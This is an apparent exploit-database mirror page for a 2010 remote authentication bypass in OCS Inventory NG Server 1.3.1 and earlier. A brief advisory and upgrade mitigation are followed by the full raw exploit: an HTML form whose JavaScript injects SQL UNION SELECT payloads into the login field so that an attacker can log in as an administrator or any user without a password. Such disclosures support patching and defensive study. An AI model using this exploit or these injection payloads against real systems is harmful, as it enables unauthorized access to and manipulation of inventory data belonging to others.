header-logo
Suggest Exploit
vendor:
OCS Inventory NG
by:
Nicolas DEROUET
7,5
CVSS
HIGH
Remote Authentication Bypass
287
CWE
Product Name: OCS Inventory NG
Affected Version From: 1.3.1 and prior (except 1.02.1 to 1.02.3)
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

OCS Inventory NG <= 1.3.1 (login) Remote Authentication Bypass

A vulnerability in OCS Inventory NG Server version 1.3.1 and prior (except 1.02.1 to 1.02.3) allows an attacker to bypass authentication and manipulate data remotely. This is due to the application not properly validating user credentials. An attacker can exploit this vulnerability by sending a specially crafted request to the application.

Mitigation:

Upgrade to the latest version of OCS Inventory NG Server.
Source

Exploit-DB raw data:

<!--
____________________________________________________________________________________________________

OCS Inventory NG Server <= 1.3.1 (login) Remote Authentication Bypass
____________________________________________________________________________________________________

 Software       : Open Computer and Software (OCS) Inventory NG
 Download       : http://www.ocsinventory-ng.org/
 Discovered by	: Nicolas DEROUET (nicolas.derouet[gmail]com)
 Discover       : 2010-02-05
 Published      : 2010-02-17
 Version        : 1.3.1 and prior (except 1.02.1 to 1.02.3)
 Impact	        : Manipulation of data
 Remote	        : Yes (No authentication is needed)
____________________________________________________________________________________________________

-->
<html>
<head>
<title>OCS Inventory NG &lt;= 1.3.1 (login) Remote Authentication Bypass</title>
<script>
  function $(id) { return document.getElementById(id); }
  function $$(id) { return $(id).options[$(id).options.selectedIndex].value; }
  function bypass()
  {
    $('log').action = $('ocsreports').value + $$('meth') + '?lang=' + $$('lang');
    if ($$('type') == 0)
      $('login').value = "' UNION SELECT id, accesslvl, '' FROM operators WHERE id='" + $('user').value;
    else
      $('login').value = "' UNION SELECT '" + $('user').value + "', '" + $$('type') + "', '";
    $('pass').value = "";
    if ($$('meth') == 'header.php')
      alert('Please go to "' + $('ocsreports').value + '" (or click on the OCS logo) !');
  }
</script>
</head>
<body>
<form name="log" id="log" action="#" method="post">
  <table align="center" border="0" width="450px">
  <tr>
    <td><b>OCSReports :</b></td>
    <td>
      <input type="text" id="ocsreports" size="40" value="http://127.0.0.1/ocsreports/" />
    </td>
  </tr>
  <tr>
    <td><b>Version :</b></td>
    <td><select id="meth">
          <option value="index.php" selected>&lt;= 1.02 --- 1.3b2 &lt;=> 1.3b3</option>
          <option value="header.php">&lt;= 1.0 (4100) --- 1.3b2 &lt;=> 1.3.1</option>
        </select>
    </td>
  </tr>
  <tr>
    <td><b>Login :</b></td>
    <td><input type="text" id="user" size="40" value="admin" /></td>
  </tr>
  <tr>
    <td><b>Type :</b></td>
    <td><select id='type'>
          <option value=0>Default (if login exists)</option>
          <option value=1>Administrator</option>
          <option value=2>User</option>
          <option value=3>Local user</option>
        </select></td>
  </tr>
  <tr>
    <td><b>Language :</b></td>
    <td><select id="lang">
          <option value="english" selected>English</option>
          <option value="french">French</option>
          <option value="german">German</option>
          <option value="spanish">Spanish</option>
        </select>
    </td>
  </tr>
  <tr>
    <td><input type="hidden" name="login" id="login" />
        <input type="hidden" name="pass"  id="pass"  /></td>
    <td><input type="submit" name="subLogin" onclick="bypass();"></td>
  </tr>
  </table>
</form>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR